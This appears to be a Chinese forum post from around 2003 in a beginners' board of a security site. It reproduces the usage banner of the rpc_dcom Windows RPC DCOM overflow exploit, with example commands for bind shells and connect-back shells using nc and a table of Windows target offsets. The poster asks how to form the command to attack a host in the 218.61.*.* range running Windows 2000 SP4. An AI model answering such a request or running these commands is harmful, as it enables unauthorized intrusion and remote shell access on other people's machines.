论坛: 菜鸟乐园 标题: [请教]RPC益出漏洞 复制本贴地址    
作者: wj7017654 [wj7017654]    论坛用户   登录
*:\>rpc_dcom
RPC DCOM overflow Vulnerability discoveried by LSD
Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org
Thanks for TopHacker!Use Win32 ShellCode  (Win32sc.h) Version 1.3.0
Modified by sbaa(sbaa@163.net) 2003/07/28 ver 0.3

Usage:rpc_dcom Os[x(offset)] targetip ([bindport(1234)]|[localIP] [LocalPort])
rpc_dcom 7 127.0.0.1 (bind 1234)
rpc_dcom 7 127.0.0.1 99 (bind 99)
rpc_dcom 7 192.168.6.1 192.168.6.2 99 (connect back 192.168.6.2 99 ,run nc -l -p
 LocalPort before!)
rpc_dcom x77e22c29 192.168.6.1 192.168.6.2 99 (use offset x77e22c29)
windows nt sp6 (cn)-0
windows nt sp6 sp6a(cn)-1       Windows 2000 SP0 (cn)-2
Windows 2000 SP1 (cn)-3 Windows 2000 SP2 (cn)-4
Windows 2000 SP3 (cn)-5 Windows 2000 SP4 (cn)-6
Windows 2000 SP0 (jp)-7 Windows 2000 SP1 (jp)-8
Windows 2000 SP2 (jp)-9 Windows 2000 SP0 (kr)-10
Windows 2000 SP1 (kr)-11        Windows 2000 SP2 (kr)-12
Windows 2000 SP4 (kr)-13        Windows 2000 SP0 (mx)-14
Windows 2000 SP1 (mx)-15        Windows 2000 SP0 (english)-16
Windows 2000 SP1 (english)-17   Windows 2000 SP2 (english)-18
Windows 2000 SP3 (english)-19   Windows 2000 SERVER SP3 (english)-20
Windows 2000 SP4 (english)-21   Windows XP SP0 (english)-22
Windows XP SP1 (english)-23     Windows xp SP1 (cn)-24
Windows 2000 SP3 (Big5)-25      Windows 2000 SP4 (Big5)-26
Windows Xp SP0 SP1 (Big5)-27

我假定目标IP是218.61.*.*,已知操作系统是2000SP4,应用网络中的命令行攻击程序rpc_dcom.exe,我的具体命令格式应该怎么写?
等待回答。

地主 发表时间: 07/30 16:13

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号